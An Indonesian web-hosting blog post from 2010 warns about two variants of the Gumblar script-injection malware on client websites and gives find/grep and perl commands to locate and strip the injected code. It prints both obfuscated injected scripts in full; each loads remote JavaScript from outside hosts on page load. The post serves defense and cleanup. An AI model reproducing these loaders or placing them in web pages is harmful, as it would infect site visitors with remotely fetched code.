Waspada, 2 Varian Virus Gumblar menginjeksi Website Anda

Kemarin tiba-tiba dapat teguran abuse dari DC (baca:Data Center) kita bahwa salah satu client ternyata telah terinfeksi virus gumblar yang dikenal juga sebagai virus frame injeksi. Kali ini ciri2 virus ini tidak hanya melakukan ijeksi pada file index.php atau index.html melainkan sudah mulai menjalar masuk ke puluhan script-script lain ber ekstensi .JS

wah… puluhan script terinfeksi, parah kan?

berikut variannya

VARIAN 1

<script>/*GNU GPL*/ try{window.onload = function(){var Hva23p3hnyirlpv7 = document.createElement('script');Hva23p3hnyirlpv7.setAttribute('type', 'text/javascript');Hva23p3hnyirlpv7.setAttribute('id', 'myscript1');Hva23p3hnyirlpv7.setAttribute('src',  'h))t#^t$#))!p&&#:^!&/^^/)^(@m&()y&#b(r@&&!!o)^w(&(s)^)$e(@&#r&))b^a#r!&$-#@c&#o#m#@&.)@$s)a!m$&s#)^u!$^n$g#!.$c!^o^@(m#.^n@!#a@@s#$!a#&-(@^g$o)#v)@&$.(!(@(e)&g&!#r)e)@)a^)t$!s(!(a@!l#e@.@)@r)#u(&#!:)@8!^)0!8$!(0!/^#m$$e)g^&a###v&!i&d!e))#o!@(.(@c&)o$!(m^&/^m&^e((^)g$!((a)#)^v@!i(@&#d#)e@&o$#.^c$!#o@m^/$#&l$a)r#@(e)^^d#&o(!()u#(t$)e##.$f(r^&(@/!(^&b!!i)$$l@)!)d^&.#@&(d$@$e(/)g$o^o$&^g^!&l()e!).(@^#c)$!o#&)@@m!/^$'.replace(/\$|\^|\!|&|\)|\(|@|#/ig, ''));Hva23p3hnyirlpv7.setAttribute('defer', 'defer');document.body.appendChild(Hva23p3hnyirlpv7);}} catch(e) {}</script>

VARIAN 2

<script>/*LGPL*/ try{ window.onload = function(){var Wzw6mi0yfxh = document.createElement('s)$c!!r!!i&$p)$t&'.replace(/\$|@|\!|&|#|\(|\)|\^/ig, ''));Wzw6mi0yfxh.setAttribute('defer', 'd)$$&e#^$f)$e)!&r$#'.replace(/\^|#|\$|\(|\)|@|\!|&/ig, ''));Wzw6mi0yfxh.setAttribute('type', 't@e!$^x)!#t!&/$(!)j(!a^$v)a^))s(!c^r#@$i@$(#p$t)&'.replace(/\)|&|#|@|\^|\(|\!|\$/ig, ''));Wzw6mi0yfxh.setAttribute('id', 'E^!j#@^#5&(^#q!!z(#q!&c#^d!!4(#z@l@@@#'.replace(/\!|\$|&|\(|\)|\^|@|#/ig, ''));Wzw6mi0yfxh.setAttribute('s&(r^!@c)#('.replace(/\!|\(|&|\$|@|\^|#|\)/ig, ''),  'h#t#&@t^&p(@):)&)/^!$/)l)e&b)!o)$n^@c!!(o)i#n$$-#f@$r@((.!$#&m@#a&^i)()n&&@i&#c(h(^i(^.$)$j(p$(#.!^!s)o&$n))$^i!(^c&!o$&@-@c@#o!(^^m&$.@t#h)^e(^l$a(c@$!e)@&)!w(e$b#!.(r^)u^$!:@$^8$0^$8)!0)&(/^&g@o$$!#o&$g!)!l#)&e$.!^$c(@@o&m!#&^/@!g^o)@^#o(^g)@l!!#^e^&.)c$&$@o^&m&($/!!&(v)!i@!r)(g#@@i$#n$^^@m#e@(^@d)#i$!a@@.^c(#o^@m(!^/&h$(u$#f&!&f#i#^n^#!g&#&t$!o&$!n&&p)&o@s#^(t&).$$$c)$$o@m$#!/)#n(i(n$(@(g$((.$)#c!o$!$m)/&('.replace(/&|\)|\$|#|@|\(|\^|\!/ig, ''));if (document){document.body.appendChild(Wzw6mi0yfxh);}} } catch(Pxbfkbch1d1sq271kl4tb) {}</script>
<!--487d9122241bbf0730e5cc7447f5ef1d-->

Seperti yang anda perhatikan, lagi-lagi sangat payah karena script tersebut di enkripsi.

SOLUSI / CARA MENGATASI

Temukan semua file yang terinfeksi dengan menggunkan peritah berikut

# find . | xargs grep 'string' -sl

isilah string dengan mengambil beberapa karakteristik virus misalnya menjadi

# find . | xargs grep 'va23p3hnyirlpv' -sl

dan eksekusi, hmnnn wowowwow berapa banyak file yang telah terinfeksi? terkejut kan karena kali ini injeksi virus telah menginfeksi puluhan script tidak seperti biasanya hanya satu atau dua script.

selanjutnya bagaimana cara menghapusnya?

seperti biasa cara menghapus paling nyaman adalah melalui shell berikut contoh command shellnya

# find . -name '*.*' | xargs perl -pi -e 's/\<script>\/\*GNU GPL\*\/ try.*Hva23p3h.*$\}<\/script>//g'

identifikasi regular expresi berdasarkan posisi awal script /*GNU GPL*/ posisi identitas tengah script ambil beberapa string dan identifikasi pada bagian akhir string virus.

stelah mengeksekusi perintah tersebut, cek ulang dengan command shell sebelumnya

Virus membawa berkah? apa itu?

Dapat beberapa limpahan klien dari beberapa hoster lain yang mensuspend website client mereka meski sementara kadang klien ngga sabar sehingga ada klien yang mencari alternatif host untuk landing website mereka selanjutnya. Tentunya kita juga membantu membersihkan website mereka dari virus tersebut. jadi kapan giliran anda? pindah saja site anda ke ph ya? hehehe

Incoming search terms for the article:

awas Malware money2008.org dan Js/Downloader menginjeksi situs anda beberapa waktu lalu satu situs yang sempat saya kelola dan...
Anda Ingin Promosikan Situs / Website Anda Sudah banyak website yang menyediakan fasilitas gratis untuk promosi, anda...
Pasang Google Pagerank Cheker Pada Website Anda – Gratis Pastikan bahwa website anda terdapat icon pagerank, dimana dengan icon...
Cegah Virus dengan Disable Autorun di Windows Baru-baru ini makin banyak virus, malware yang memanfaatkan proses autorun...
Statistik Website Gratis Dengan Google Analytic Anda ingin mengetahui berapa banyak netter yang mengunjungi website anda....

Related posts brought to you by Yet Another Related Posts Plugin.

This entry was written by hadi and posted on Januari 9, 2010 at 10:56 pm and filed under Internet, Tips & Trick. Bookmark the permalink. Follow any comments here with the RSS feed for this post.

3 Responses to “Waspada, 2 Varian Virus Gumblar menginjeksi Website Anda”

1
sariful Says:
Januari 27th, 2010 at 8:34 am
promosi yang bagus.. dan akhirnya saya juga nyasar ke sini :d
2
hadi Says:
Januari 27th, 2010 at 9:00 am
hehe sip mas
3
ADAbisnis.com Says:
Januari 31st, 2010 at 6:25 pm
Wkwkwkwk… promosi yg bagus bos… Pusat hosting memang ok bgt. Sudah pelayanannya ramah, dedicated server lagi. Kenceng euy.

Web Hosting Surabaya Blogs

Similar Posts

Komentar Terakhir

hab.la

Online support

Kategori

Highest Rated